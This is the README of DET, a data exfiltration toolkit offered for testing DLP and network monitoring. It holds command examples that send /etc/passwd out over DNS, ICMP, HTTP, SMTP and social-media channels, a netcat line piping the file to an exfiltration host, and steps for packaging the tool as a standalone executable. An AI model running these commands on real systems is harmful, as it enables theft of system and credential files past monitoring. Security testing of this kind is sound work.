DET (is provided AS IS), is a proof of concept to perform Data Exfiltration using either single or multiple channel(s) at the same time.
The idea was to create a generic toolkit to plug any kind of protocol/service to test implmented Network Monitoring and Data Leakage Prevention (DLP) solutions configuration, against different data exfiltration techniques.
DET has been presented at BSides Ljubljana on the 9th of March 2016 and the slides will be available here. Slides are available here.
Clone the repo:
git clone https://github.com/PaulSec/DET.git
Then:
pip install -r requirements.txt --user
In order to use DET, you will need to configure it and add your proper settings (eg. SMTP/IMAP, AES256 encryption
passphrase, proxies and so on). A configuration example file has been provided and is called: config-sample.json
{
"plugins": {
"http": {
"target": "192.168.0.12",
"port": 8080,
"proxies": ["192.168.0.13", "192.168.0.14"]
},
"google_docs": {
"target": "conchwaiter.uk.plak.cc",
"port": 8080
},
"dns": {
"key": "google.com",
"target": "192.168.0.12",
"port": 53,
"proxies": ["192.168.0.13", "192.168.0.14"]
},
[...SNIP...]
"icmp": {
"target": "192.168.0.12",
"proxies": ["192.168.0.13", "192.168.0.14"]
},
"slack": {
"api_token": "xoxb-XXXXXXXXXXX",
"chan_id": "XXXXXXXXXXX",
"bot_id": "<@XXXXXXXXXXX>:"
},
"smtp": {
"target": "192.168.0.12",
"port": 25,
"proxies": ["192.168.0.13", "192.168.0.14"]
},
"ftp": {
"target": "192.168.0.12",
"port": 21,
"proxies": ["192.168.0.13", "192.168.0.14"]
},
"sip": {
"target": "192.168.0.12",
"port": 5060,
"proxies": ["192.168.0.13", "192.168.0.14"]
}
},
"AES_KEY": "THISISACRAZYKEY",
"max_time_sleep": 10,
"min_time_sleep": 1,
"max_bytes_read": 400,
"min_bytes_read": 300,
"compression": 1
}
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
[-L | -Z]
Data Exfiltration Toolkit (@PaulWebSec)
optional arguments:
-h, --help show this help message and exit
-c CONFIG Configuration file (eg. '-c ./config-sample.json')
-f FILE File to exfiltrate (eg. '-f /etc/passwd')
-d FOLDER Folder to exfiltrate (eg. '-d /etc/')
-p PLUGIN Plugins to use (eg. '-p dns,twitter')
-e EXCLUDE Plugins to exclude (eg. '-e gmail,icmp')
-L Server mode
-Z Proxy mode
To load every plugin:
python det.py -L -c ./config.json
To load only twitter and gmail modules:
python det.py -L -c ./config.json -p twitter,gmail
To load every plugin and exclude DNS:
python det.py -L -c ./config.json -e dns
To load every plugin:
python det.py -c ./config.json -f /etc/passwd
To load only twitter and gmail modules:
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd
To load every plugin and exclude DNS:
python det.py -c ./config.json -e dns -f /etc/passwd
You can also listen for files from stdin (e.g output of a netcat listener):
nc -lp 1337 | python det.py -c ./config.json -e http -f stdin
Then send the file to netcat:
nc $exfiltration_host 1337 -q 0 < /etc/passwd
Don't forget netcat's -q 0
option so that netcat quits once it has finished sending the file.
And in PowerShell (HTTP module):
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'
In this mode the client will proxify the incoming requests towards the final destination.
The proxies addresses should be set in config.json
file.
python det.py -c ./config.json -p dns,icmp -Z
DET has been adapted in order to run as a standalone executable with the help of PyInstaller.
pip install pyinstaller
The spec file det.spec
is provided in order to help you build your executable.
# -*- mode: python -*-
block_cipher = None
import sys
sys.modules['FixTk'] = None
a = Analysis(['det.py'],
pathex=['.'],
binaries=[],
datas=[('plugins', 'plugins'), ('config-sample.json', '.')],
hiddenimports=['plugins/dns', 'plugins/icmp'],
hookspath=[],
runtime_hooks=[],
excludes=['FixTk', 'tcl', 'tk', '_tkinter', 'tkinter', 'Tkinter'],
win_no_prefer_redirects=False,
win_private_assemblies=False,
cipher=block_cipher)
pyz = PYZ(a.pure, a.zipped_data,
cipher=block_cipher)
exe = EXE(pyz,
a.scripts,
a.binaries,
a.zipfiles,
a.datas,
name='det',
debug=False,
strip=False,
upx=True,
console=True )
Specify the modules you need to ship with you executable by editing the hiddenimports
array.
In the example above, PyInstaller will package the DNS and ICMP plugins along with your final executable.
Finally, launch PyInstaller:
pyinstaller det.spec
Please note that the number of loaded plugins will reflect on the size of the final executable. If you have issues with the generated executable or found a workaround for a tricky situation, please open an issue so this guide can be updated for everyone.
So far, DET supports multiple protocols, listed here:
- HTTP(S)
- ICMP
- DNS
- SMTP/IMAP (Pure SMTP + Gmail)
- Raw TCP / UDP
- FTP
- SIP
- PowerShell implementation (HTTP, DNS, ICMP, SMTP (used with Gmail))
- Derived Unique Key Per Transaction (DUKPT) key management
And other "services":
- Google Docs (Unauthenticated)
- Twitter (Direct Messages)
- Slack
- Add proper encryption (eg. AES-256) Thanks to ryanohoro
- Compression (extremely important!) Thanks to chokepoint
- Add support for C&C-like multi-host file exfiltration (Proxy mode)
- Discovery mode (where distributed agents can learn about the presence of each other)
- Egress traffic testing
- Proper data obfuscation and integrating Cloakify Toolset Toolset
- FlickR LSB Steganography and Youtube modules
Some pretty cool references/credits to people I got inspired by with their project:
- Powershellery from Nullbind.
- PyExfil, truely awesome.
- dnsteal from m57.
- NaishoDeNusumu from 3nc0d3r.
- Exphil from Glenn Wilkinson.
- WebExfile from Saif El-Sherei
You can reach me on Twitter @PaulWebSec. Feel free if you want to contribute, clone, fork, submit your PR and so on.
DET is licensed under a MIT License.